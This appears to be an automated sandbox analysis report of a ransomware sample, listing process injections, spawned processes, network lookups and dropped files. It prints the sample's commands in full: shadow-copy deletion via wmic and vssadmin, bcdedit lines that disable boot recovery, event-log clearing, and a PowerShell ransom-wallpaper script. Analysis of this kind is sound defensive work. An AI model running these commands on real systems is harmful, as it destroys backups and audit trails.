Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2008 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\SYSTEM32\cmd.exe
PID 2952 wrote to memory of 1200 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2952 wrote to memory of 1200 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4788 wrote to memory of 4348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4788 wrote to memory of 4348 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3468 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3468 wrote to memory of 1172 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4468 wrote to memory of 5116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 5116 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4764 wrote to memory of 4024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4764 wrote to memory of 4024 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2008 wrote to memory of 35880 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2008 wrote to memory of 35880 N/A C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 35880 wrote to memory of 36176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 35880 wrote to memory of 36176 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 35880 wrote to memory of 36604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 35880 wrote to memory of 36604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe

"C:\Users\Admin\AppData\Local\Temp\00688ead526d7ae741450c176a3c9a0a24f4da5980c6c7c09b6088fbee205d7f.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\6581503.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp

Files

memory/2008-0-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2008-4-0x0000000002270000-0x00000000022B3000-memory.dmp

memory/2008-3-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2008-9-0x0000000000400000-0x00000000004E5000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 b69a0aa7abf916a5f00d0f438cf98fa6
SHA1 1ad8aec6b066487d69492225bb6493b4afd2db64
SHA256 9a3b665f5458ade3c61be4fd2f906a915f8c523127be7456a6bff3677356289d
SHA512 cec0c8f59d7c204f33452223b0f9eaa55bc0ef07f983c42fbdd3ff0906814bf907816bd6b4dd2dbb3292f6396f22b50b0736caf469f1a942fdd7cd09c099cd72

memory/2008-8-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2008-7-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2008-6-0x0000000000580000-0x0000000000581000-memory.dmp

memory/2008-5-0x0000000000401000-0x000000000049D000-memory.dmp

memory/2008-2-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/2008-1-0x0000000000400000-0x00000000004E5000-memory.dmp

memory/5116-17433-0x000001A2D44B0000-0x000001A2D44D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ua50kyu.uww.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2008-22635-0x0000000002270000-0x00000000022B3000-memory.dmp

memory/2008-22634-0x0000000000401000-0x000000000049D000-memory.dmp

memory/2008-22633-0x0000000000400000-0x00000000004E5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00